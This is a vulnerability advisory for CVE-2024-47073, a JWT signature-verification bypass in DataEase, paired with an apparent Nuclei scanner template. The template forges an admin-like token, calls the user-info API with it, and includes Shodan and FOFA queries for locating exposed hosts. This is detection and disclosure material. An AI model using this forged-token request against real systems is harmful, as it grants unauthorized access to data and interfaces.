DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
PoC code [publicly available]
id: CVE-2024-47073

info:
  name: DataEase v2.10.2 - JWT Signature Verification Bypass
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-47073
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-47073
    cwe-id: CWE-347
    epss-score: 0.28152
    epss-percentile: 0.96335
    cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2024,dataease,jwt

variables:
  payload: '{"uid":1,"oid":1,"exp":{{unix_time(1000)}}}'
  token: '{{generate_jwt(payload,"HS256","random") }}'

http:
  - raw:
      - |
        GET /de2api/user/info HTTP/1.1
        Host: {{Hostname}}
        X-DE-TOKEN: {{token}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - data
          - '"oid":"1"'
          - code
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210091bd95b87a457e0c7b8e0a032471b6e68e7c7c4be42f9d5ab57ab8ec9684a121022100b6b8ea4bf2a75a1079769bf0c530cc2ca93f110979ab5d5e18ae04dad3fad868:922c64590222798bb761d5b6d8e72950